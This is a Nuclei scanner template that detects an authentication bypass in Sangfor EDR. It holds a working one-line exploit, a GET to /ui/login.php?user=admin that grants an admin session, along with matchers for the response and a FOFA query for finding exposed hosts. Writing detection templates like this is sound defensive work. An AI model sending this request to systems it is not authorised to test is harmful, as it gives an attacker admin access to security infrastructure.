id: sangfor-edr-auth-bypass

info:
  name: Sangfor EDR - Authentication Bypass
  author: princechaddha
  severity: high
  description: |
    Sangfor EDR contains an authentication bypass vulnerability. An attacker can access the system with admin privileges by accessing the login page directly using a provided username rather than going through the login screen without providing a username. This makes it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cwe-id: CWE-287
  metadata:
    fofa-query: app="sangfor"
  tags: sangfor,auth-bypass,login

requests:
  - method: GET
    path:
      - "{{BaseURL}}/ui/login.php?user=admin"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "/download/edr_installer_"

      - type: word
        part: header
        words:
          - 'Set-Cookie=""'
        negative: true

      - type: word
        part: header
        words:
          - 'Set-Cookie='

      - type: status
        status:
          - 302

# Enhanced by md on 2022/10/19